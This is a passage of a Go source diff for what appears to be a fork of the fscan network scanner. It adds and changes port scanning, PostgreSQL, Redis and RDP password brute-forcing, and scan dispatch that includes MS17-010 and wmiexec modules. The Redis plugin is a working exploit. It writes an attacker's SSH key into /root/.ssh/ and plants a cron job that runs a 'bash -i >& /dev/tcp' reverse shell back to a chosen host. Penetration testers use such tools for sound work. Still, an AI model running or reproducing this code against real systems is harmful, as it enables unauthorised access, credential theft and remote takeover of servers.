||||
"time"
|
||||
)
|
||||
|
||||
func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, adjustedTimeout int64) {
|
||||
for port := range ports {
|
||||
con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout)*time.Second)
|
||||
if err == nil {
|
||||
con.Close()
|
||||
address := host + ":" + strconv.Itoa(port)
|
||||
result := fmt.Sprintf("%s open", address)
|
||||
common.LogSuccess(result)
|
||||
respondingHosts <- address
|
||||
}
|
||||
}
|
||||
done <- true
|
||||
type Addr struct {
|
||||
ip string
|
||||
port int
|
||||
}
|
||||
|
||||
func ScanAllports(address string, probePorts []int, threads int, adjustedTimeout int64) ([]string, error) {
|
||||
ports := make(chan int, 20)
|
||||
results := make(chan string)
|
||||
done := make(chan bool, threads)
|
||||
|
||||
for worker := 0; worker < threads; worker++ {
|
||||
go ProbeHosts(address, ports, results, done, adjustedTimeout)
|
||||
}
|
||||
|
||||
for _, port := range probePorts {
|
||||
ports <- port
|
||||
}
|
||||
close(ports)
|
||||
|
||||
var responses = []string{}
|
||||
for {
|
||||
select {
|
||||
case found := <-results:
|
||||
responses = append(responses, found)
|
||||
case <-done:
|
||||
threads--
|
||||
if threads == 0 {
|
||||
return responses, nil
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TCPportScan(hostslist []string, ports string, timeout int64) []string {
|
||||
func PortScan(hostslist []string, ports string, timeout int64) []string {
|
||||
var AliveAddress []string
|
||||
probePorts := common.ParsePort(ports)
|
||||
lm := 20
|
||||
if len(hostslist) > 5 && len(hostslist) <= 50 {
|
||||
lm = 40
|
||||
} else if len(hostslist) > 50 && len(hostslist) <= 100 {
|
||||
lm = 50
|
||||
} else if len(hostslist) > 100 && len(hostslist) <= 150 {
|
||||
lm = 60
|
||||
} else if len(hostslist) > 150 && len(hostslist) <= 200 {
|
||||
lm = 70
|
||||
} else if len(hostslist) > 200 {
|
||||
lm = 75
|
||||
}
|
||||
noPorts := common.ParsePort(common.NoPorts)
|
||||
if len(noPorts) > 0 {
|
||||
temp := map[int]struct{}{}
|
||||
for _, port := range probePorts {
|
||||
temp[port] = struct{}{}
|
||||
}
|
||||
|
||||
thread := 10
|
||||
if len(probePorts) > 500 && len(probePorts) <= 4000 {
|
||||
thread = len(probePorts) / 100
|
||||
} else if len(probePorts) > 4000 && len(probePorts) <= 6000 {
|
||||
thread = len(probePorts) / 200
|
||||
} else if len(probePorts) > 6000 && len(probePorts) <= 10000 {
|
||||
thread = len(probePorts) / 350
|
||||
} else if len(probePorts) > 10000 && len(probePorts) < 50000 {
|
||||
thread = len(probePorts) / 400
|
||||
} else if len(probePorts) >= 50000 && len(probePorts) <= 65535 {
|
||||
thread = len(probePorts) / 500
|
||||
}
|
||||
for _, port := range noPorts {
|
||||
delete(temp, port)
|
||||
}
|
||||
|
||||
var newDatas []int
|
||||
for port, _ := range temp {
|
||||
newDatas = append(newDatas, port)
|
||||
}
|
||||
probePorts = newDatas
|
||||
sort.Ints(probePorts)
|
||||
}
|
||||
workers := common.Threads
|
||||
Addrs := make(chan Addr, len(hostslist)*len(probePorts))
|
||||
results := make(chan string, len(hostslist)*len(probePorts))
|
||||
var wg sync.WaitGroup
|
||||
mutex := &sync.Mutex{}
|
||||
limiter := make(chan struct{}, lm)
|
||||
for _, host := range hostslist {
|
||||
wg.Add(1)
|
||||
limiter <- struct{}{}
|
||||
go func(host string) {
|
||||
defer wg.Done()
|
||||
if aliveAdd, err := ScanAllports(host, probePorts, thread, timeout); err == nil && len(aliveAdd) > 0 {
|
||||
mutex.Lock()
|
||||
AliveAddress = append(AliveAddress, aliveAdd...)
|
||||
mutex.Unlock()
|
||||
|
||||
//接收结果
|
||||
go func() {
|
||||
for found := range results {
|
||||
AliveAddress = append(AliveAddress, found)
|
||||
wg.Done()
|
||||
}
|
||||
}()
|
||||
|
||||
//多线程扫描
|
||||
for i := 0; i < workers; i++ {
|
||||
go func() {
|
||||
for addr := range Addrs {
|
||||
PortConnect(addr, results, timeout, &wg)
|
||||
wg.Done()
|
||||
}
|
||||
<-limiter
|
||||
}(host)
|
||||
}()
|
||||
}
|
||||
|
||||
//添加扫描目标
|
||||
for _, port := range probePorts {
|
||||
for _, host := range hostslist {
|
||||
wg.Add(1)
|
||||
Addrs <- Addr{host, port}
|
||||
}
|
||||
}
|
||||
wg.Wait()
|
||||
close(Addrs)
|
||||
close(results)
|
||||
return AliveAddress
|
||||
}
|
||||
|
||||
func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
|
||||
host, port := addr.ip, addr.port
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err == nil {
|
||||
address := host + ":" + strconv.Itoa(port)
|
||||
result := fmt.Sprintf("%s open", address)
|
||||
common.LogSuccess(result)
|
||||
wg.Add(1)
|
||||
respondingHosts <- address
|
||||
}
|
||||
}
|
||||
|
||||
func NoPortScan(hostslist []string, ports string) (AliveAddress []string) {
|
||||
probePorts := common.ParsePort(ports)
|
||||
noPorts := common.ParsePort(common.NoPorts)
|
||||
if len(noPorts) > 0 {
|
||||
temp := map[int]struct{}{}
|
||||
for _, port := range probePorts {
|
||||
temp[port] = struct{}{}
|
||||
}
|
||||
|
||||
for _, port := range noPorts {
|
||||
delete(temp, port)
|
||||
}
|
||||
|
||||
var newDatas []int
|
||||
for port, _ := range temp {
|
||||
newDatas = append(newDatas, port)
|
||||
}
|
||||
probePorts = newDatas
|
||||
sort.Ints(probePorts)
|
||||
}
|
||||
for _, port := range probePorts {
|
||||
for _, host := range hostslist {
|
||||
address := host + ":" + strconv.Itoa(port)
|
||||
AliveAddress = append(AliveAddress, address)
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
|
|
|
@ -4,12 +4,16 @@ import (
|
|||
"database/sql"
|
||||
"fmt"
|
||||
_ "github.com/lib/pq"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func PostgresScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["postgresql"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
|
@ -17,9 +21,15 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
|
|||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] psql %v %v %v %v %v", info.Host, common.PORTList["psql"], user, pass, err)
|
||||
errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -28,15 +38,15 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, common.PORTList["psql"], user, pass
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
|
||||
db, err := sql.Open("mysql", dataSourceName)
|
||||
db, err := sql.Open("postgres", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
if err == nil {
|
||||
result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
common.LogSuccess(result)
|
||||
flag = true
|
||||
}
|
||||
|
|
|
@ -0,0 +1,197 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"github.com/tomatome/grdp/core"
|
||||
"github.com/tomatome/grdp/glog"
|
||||
"github.com/tomatome/grdp/protocol/nla"
|
||||
"github.com/tomatome/grdp/protocol/pdu"
|
||||
"github.com/tomatome/grdp/protocol/rfb"
|
||||
"github.com/tomatome/grdp/protocol/sec"
|
||||
"github.com/tomatome/grdp/protocol/t125"
|
||||
"github.com/tomatome/grdp/protocol/tpkt"
|
||||
"github.com/tomatome/grdp/protocol/x224"
|
||||
"log"
|
||||
"os"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
type Brutelist struct {
|
||||
user string
|
||||
pass string
|
||||
}
|
||||
|
||||
func RdpScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
|
||||
var wg sync.WaitGroup
|
||||
var signal bool
|
||||
var num = 0
|
||||
var all = len(common.Userdict["rdp"]) * len(common.Passwords)
|
||||
var mutex sync.Mutex
|
||||
brlist := make(chan Brutelist, all)
|
||||
port, _ := strconv.Atoi(info.Ports)
|
||||
|
||||
for _, user := range common.Userdict["rdp"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
brlist <- Brutelist{user, pass}
|
||||
}
|
||||
}
|
||||
|
||||
for i := 0; i < common.BruteThread; i++ {
|
||||
wg.Add(1)
|
||||
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
|
||||
}
|
||||
|
||||
close(brlist)
|
||||
go func() {
|
||||
wg.Wait()
|
||||
signal = true
|
||||
}()
|
||||
for !signal {
|
||||
}
|
||||
|
||||
return tmperr
|
||||
}
|
||||
|
||||
func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brutelist, signal *bool, num *int, all int, mutex *sync.Mutex, timeout int64) {
|
||||
defer wg.Done()
|
||||
for one := range brlist {
|
||||
if *signal == true {
|
||||
return
|
||||
}
|
||||
go incrNum(num, mutex)
|
||||
user, pass := one.user, one.pass
|
||||
flag, err := RdpConn(host, domain, user, pass, port, timeout)
|
||||
if flag == true && err == nil {
|
||||
var result string
|
||||
if domain != "" {
|
||||
result = fmt.Sprintf("[+] RDP:%v:%v:%v\\%v %v", host, port, domain, user, pass)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] RDP:%v:%v:%v %v", host, port, user, pass)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
*signal = true
|
||||
return
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func incrNum(num *int, mutex *sync.Mutex) {
|
||||
mutex.Lock()
|
||||
*num = *num + 1
|
||||
mutex.Unlock()
|
||||
}
|
||||
|
||||
func RdpConn(ip, domain, user, password string, port int, timeout int64) (bool, error) {
|
||||
target := fmt.Sprintf("%s:%d", ip, port)
|
||||
g := NewClient(target, glog.NONE)
|
||||
err := g.Login(domain, user, password, timeout)
|
||||
|
||||
if err == nil {
|
||||
return true, nil
|
||||
}
|
||||
|
||||
return false, err
|
||||
}
|
||||
|
||||
type Client struct {
|
||||
Host string // ip:port
|
||||
tpkt *tpkt.TPKT
|
||||
x224 *x224.X224
|
||||
mcs *t125.MCSClient
|
||||
sec *sec.Client
|
||||
pdu *pdu.Client
|
||||
vnc *rfb.RFB
|
||||
}
|
||||
|
||||
func NewClient(host string, logLevel glog.LEVEL) *Client {
|
||||
glog.SetLevel(logLevel)
|
||||
logger := log.New(os.Stdout, "", 0)
|
||||
glog.SetLogger(logger)
|
||||
return &Client{
|
||||
Host: host,
|
||||
}
|
||||
}
|
||||
|
||||
func (g *Client) Login(domain, user, pwd string, timeout int64) error {
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return fmt.Errorf("[dial err] %v", err)
|
||||
}
|
||||
glog.Info(conn.LocalAddr().String())
|
||||
|
||||
g.tpkt = tpkt.New(core.NewSocketLayer(conn), nla.NewNTLMv2(domain, user, pwd))
|
||||
g.x224 = x224.New(g.tpkt)
|
||||
g.mcs = t125.NewMCSClient(g.x224)
|
||||
g.sec = sec.NewClient(g.mcs)
|
||||
g.pdu = pdu.NewClient(g.sec)
|
||||
|
||||
g.sec.SetUser(user)
|
||||
g.sec.SetPwd(pwd)
|
||||
g.sec.SetDomain(domain)
|
||||
//g.sec.SetClientAutoReconnect()
|
||||
|
||||
g.tpkt.SetFastPathListener(g.sec)
|
||||
g.sec.SetFastPathListener(g.pdu)
|
||||
g.pdu.SetFastPathSender(g.tpkt)
|
||||
|
||||
//g.x224.SetRequestedProtocol(x224.PROTOCOL_SSL)
|
||||
//g.x224.SetRequestedProtocol(x224.PROTOCOL_RDP)
|
||||
|
||||
err = g.x224.Connect()
|
||||
if err != nil {
|
||||
return fmt.Errorf("[x224 connect err] %v", err)
|
||||
}
|
||||
glog.Info("wait connect ok")
|
||||
wg := &sync.WaitGroup{}
|
||||
breakFlag := false
|
||||
wg.Add(1)
|
||||
|
||||
g.pdu.On("error", func(e error) {
|
||||
err = e
|
||||
glog.Error("error", e)
|
||||
g.pdu.Emit("done")
|
||||
})
|
||||
g.pdu.On("close", func() {
|
||||
err = errors.New("close")
|
||||
glog.Info("on close")
|
||||
g.pdu.Emit("done")
|
||||
})
|
||||
g.pdu.On("success", func() {
|
||||
err = nil
|
||||
glog.Info("on success")
|
||||
g.pdu.Emit("done")
|
||||
})
|
||||
g.pdu.On("ready", func() {
|
||||
glog.Info("on ready")
|
||||
g.pdu.Emit("done")
|
||||
})
|
||||
g.pdu.On("update", func(rectangles []pdu.BitmapData) {
|
||||
glog.Info("on update:", rectangles)
|
||||
})
|
||||
g.pdu.On("done", func() {
|
||||
if breakFlag == false {
|
||||
breakFlag = true
|
||||
wg.Done()
|
||||
}
|
||||
})
|
||||
wg.Wait()
|
||||
return err
|
||||
}
|
150
Plugins/redis.go
150
Plugins/redis.go
|
@ -3,27 +3,42 @@ package Plugins
|
|||
import (
|
||||
"bufio"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"net"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
dbfilename string
|
||||
dir string
|
||||
)
|
||||
|
||||
func RedisScan(info *common.HostInfo) (tmperr error) {
|
||||
starttime := time.Now().Unix()
|
||||
flag, err := RedisUnauth(info)
|
||||
if flag == true && err == nil {
|
||||
return err
|
||||
}
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", "redis", -1)
|
||||
flag, err := RedisConn(info, pass)
|
||||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] redis %v %v %v %v %v", info.Host, common.PORTList["redis"], pass, err)
|
||||
errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
return tmperr
|
||||
|
@ -31,12 +46,20 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
|
||||
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
defer conn.Close()
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("auth %s\r\n", pass)))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
|
@ -46,22 +69,37 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
|||
return flag, err
|
||||
}
|
||||
if strings.Contains(reply, "+OK") {
|
||||
result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
|
||||
common.LogSuccess(result)
|
||||
flag = true
|
||||
Expoilt(realhost, conn)
|
||||
dbfilename, dir, err = getconfig(conn)
|
||||
if err != nil {
|
||||
result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
|
||||
common.LogSuccess(result)
|
||||
return flag, err
|
||||
} else {
|
||||
result := fmt.Sprintf("[+] Redis:%s %s file:%s/%s", realhost, pass, dir, dbfilename)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
err = Expoilt(realhost, conn)
|
||||
}
|
||||
return flag, err
|
||||
}
|
||||
|
||||
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
|
||||
flag = false
|
||||
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
|
||||
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
defer conn.Close()
|
||||
_, err = conn.Write([]byte("info\r\n"))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
|
@ -71,10 +109,17 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
return flag, err
|
||||
}
|
||||
if strings.Contains(reply, "redis_version") {
|
||||
result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
flag = true
|
||||
Expoilt(realhost, conn)
|
||||
dbfilename, dir, err = getconfig(conn)
|
||||
if err != nil {
|
||||
result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
return flag, err
|
||||
} else {
|
||||
result := fmt.Sprintf("[+] Redis:%s unauthorized file:%s/%s", realhost, dir, dbfilename)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
err = Expoilt(realhost, conn)
|
||||
}
|
||||
return flag, err
|
||||
}
|
||||
|
@ -85,24 +130,25 @@ func Expoilt(realhost string, conn net.Conn) error {
|
|||
return err
|
||||
}
|
||||
if flagSsh == true {
|
||||
result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
|
||||
result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost)
|
||||
common.LogSuccess(result)
|
||||
if common.RedisFile != "" {
|
||||
writeok, text, err := writekey(conn, common.RedisFile)
|
||||
if err != nil {
|
||||
fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
|
||||
return err
|
||||
}
|
||||
if writeok {
|
||||
result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
|
||||
result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
|
||||
common.LogSuccess(result)
|
||||
} else {
|
||||
fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
|
||||
fmt.Println("[-] Redis:", realhost, "SSHPUB write failed", text)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if flagCron == true {
|
||||
result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
|
||||
result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost)
|
||||
common.LogSuccess(result)
|
||||
if common.RedisShell != "" {
|
||||
writeok, text, err := writecron(conn, common.RedisShell)
|
||||
|
@ -110,13 +156,14 @@ func Expoilt(realhost string, conn net.Conn) error {
|
|||
return err
|
||||
}
|
||||
if writeok {
|
||||
result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
|
||||
result := fmt.Sprintf("[+] %v /var/spool/cron/root was written successfully", realhost)
|
||||
common.LogSuccess(result)
|
||||
} else {
|
||||
fmt.Println("Redis:", realhost, "cron write failed", text)
|
||||
fmt.Println("[-] Redis:", realhost, "cron write failed", text)
|
||||
}
|
||||
}
|
||||
}
|
||||
err = recoverdb(dbfilename, dir, conn)
|
||||
return err
|
||||
}
|
||||
|
||||
|
@ -199,7 +246,11 @@ func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
|
|||
return flag, text, err
|
||||
}
|
||||
if strings.Contains(text, "OK") {
|
||||
scanIp, scanPort := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
|
||||
target := strings.Split(host, ":")
|
||||
if len(target) < 2 {
|
||||
return flag, "host error", err
|
||||
}
|
||||
scanIp, scanPort := target[0], target[1]
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scanIp, scanPort)))
|
||||
if err != nil {
|
||||
return flag, text, err
|
||||
|
@ -247,14 +298,15 @@ func Readfile(filename string) (string, error) {
|
|||
}
|
||||
|
||||
func readreply(conn net.Conn) (result string, err error) {
|
||||
buf := make([]byte, 4096)
|
||||
size := 5 * 1024
|
||||
buf := make([]byte, size)
|
||||
for {
|
||||
count, err := conn.Read(buf)
|
||||
if err != nil {
|
||||
break
|
||||
}
|
||||
result += string(buf[0:count])
|
||||
if count < 4096 {
|
||||
if count < size {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
@ -287,3 +339,55 @@ func testwrite(conn net.Conn) (flag bool, flagCron bool, err error) {
|
|||
}
|
||||
return flag, flagCron, err
|
||||
}
|
||||
|
||||
func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG GET dbfilename\r\n")))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
text, err := readreply(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
text1 := strings.Split(text, "\r\n")
|
||||
if len(text1) > 2 {
|
||||
dbfilename = text1[len(text1)-2]
|
||||
} else {
|
||||
dbfilename = text1[0]
|
||||
}
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG GET dir\r\n")))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
text, err = readreply(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
text1 = strings.Split(text, "\r\n")
|
||||
if len(text1) > 2 {
|
||||
dir = text1[len(text1)-2]
|
||||
} else {
|
||||
dir = text1[0]
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func recoverdb(dbfilename string, dir string, conn net.Conn) (err error) {
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename %s\r\n", dbfilename)))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
dbfilename, err = readreply(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dir %s\r\n", dir)))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
dir, err = readreply(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
return
|
||||
}
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/Web_Scan/lib"
|
||||
"example.com/fxscan/common"
|
||||
"reflect"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
@ -11,77 +11,114 @@ import (
|
|||
)
|
||||
|
||||
func Scan(info common.HostInfo) {
|
||||
fmt.Println("scan start")
|
||||
Hosts, _ := common.ParseIP(info.Host, common.HostFile)
|
||||
if common.IsPing == false {
|
||||
Hosts = ICMPRun(Hosts, common.Ping)
|
||||
fmt.Println("icmp alive hosts len is:", len(Hosts))
|
||||
}
|
||||
if info.Scantype == "icmp" {
|
||||
fmt.Println("start infoscan")
|
||||
Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts)
|
||||
if err != nil {
|
||||
fmt.Println("len(hosts)==0", err)
|
||||
return
|
||||
}
|
||||
AlivePorts := TCPportScan(Hosts, info.Ports, info.Timeout)
|
||||
if info.Scantype == "portscan" {
|
||||
return
|
||||
}
|
||||
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
|
||||
for _, port := range common.PORTList {
|
||||
severports = append(severports, strconv.Itoa(port))
|
||||
}
|
||||
lib.Inithttp(common.Pocinfo)
|
||||
var ch = make(chan struct{}, common.Threads)
|
||||
var wg = sync.WaitGroup{}
|
||||
for _, targetIP := range AlivePorts {
|
||||
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
|
||||
if info.Scantype == "all" {
|
||||
if info.Ports == "445" { //scan more vul
|
||||
AddScan("1000001", info, ch, &wg)
|
||||
AddScan("1000002", info, ch, &wg)
|
||||
} else if IsContain(severports, info.Ports) {
|
||||
AddScan(info.Ports, info, ch, &wg)
|
||||
} else {
|
||||
AddScan("1000003", info, ch, &wg) //webtitle
|
||||
web := strconv.Itoa(common.PORTList["web"])
|
||||
ms17010 := strconv.Itoa(common.PORTList["ms17010"])
|
||||
if len(Hosts) > 0 || len(common.HostPort) > 0 {
|
||||
if common.NoPing == false && len(Hosts) > 0 {
|
||||
Hosts = CheckLive(Hosts, common.Ping)
|
||||
fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
|
||||
}
|
||||
if common.Scantype == "icmp" {
|
||||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
common.GC()
|
||||
var AlivePorts []string
|
||||
if common.Scantype == "webonly" || common.Scantype == "webpoc" {
|
||||
AlivePorts = NoPortScan(Hosts, info.Ports)
|
||||
} else if common.Scantype == "hostname" {
|
||||
info.Ports = "139"
|
||||
AlivePorts = NoPortScan(Hosts, info.Ports)
|
||||
} else if len(Hosts) > 0 {
|
||||
AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
|
||||
fmt.Println("[*] alive ports len is:", len(AlivePorts))
|
||||
if common.Scantype == "portscan" {
|
||||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
}
|
||||
if len(common.HostPort) > 0 {
|
||||
AlivePorts = append(AlivePorts, common.HostPort...)
|
||||
AlivePorts = common.RemoveDuplicate(AlivePorts)
|
||||
common.HostPort = nil
|
||||
fmt.Println("[*] AlivePorts len is:", len(AlivePorts))
|
||||
}
|
||||
common.GC()
|
||||
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
|
||||
for _, port := range common.PORTList {
|
||||
severports = append(severports, strconv.Itoa(port))
|
||||
}
|
||||
fmt.Println("start vulscan")
|
||||
for _, targetIP := range AlivePorts {
|
||||
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
|
||||
if common.Scantype == "all" || common.Scantype == "main" {
|
||||
switch {
|
||||
case info.Ports == "135":
|
||||
AddScan(info.Ports, info, &ch, &wg) //findnet
|
||||
if common.IsWmi {
|
||||
AddScan("1000005", info, &ch, &wg) //wmiexec
|
||||
}
|
||||
case info.Ports == "445":
|
||||
AddScan(ms17010, info, &ch, &wg) //ms17010
|
||||
//AddScan(info.Ports, info, ch, &wg) //smb
|
||||
//AddScan("1000002", info, ch, &wg) //smbghost
|
||||
case info.Ports == "9000":
|
||||
AddScan(web, info, &ch, &wg) //http
|
||||
AddScan(info.Ports, info, &ch, &wg) //fcgiscan
|
||||
case IsContain(severports, info.Ports):
|
||||
AddScan(info.Ports, info, &ch, &wg) //plugins scan
|
||||
default:
|
||||
AddScan(web, info, &ch, &wg) //webtitle
|
||||
}
|
||||
} else {
|
||||
scantype := strconv.Itoa(common.PORTList[common.Scantype])
|
||||
AddScan(scantype, info, &ch, &wg)
|
||||
}
|
||||
} else {
|
||||
port, _ := common.PortlistBack[info.Scantype]
|
||||
scantype := strconv.Itoa(port)
|
||||
AddScan(scantype, info, ch, &wg)
|
||||
}
|
||||
}
|
||||
common.GC()
|
||||
for _, url := range common.Urls {
|
||||
info.Url = url
|
||||
AddScan(web, info, &ch, &wg)
|
||||
}
|
||||
common.GC()
|
||||
wg.Wait()
|
||||
common.WaitSave()
|
||||
common.LogWG.Wait()
|
||||
close(common.Results)
|
||||
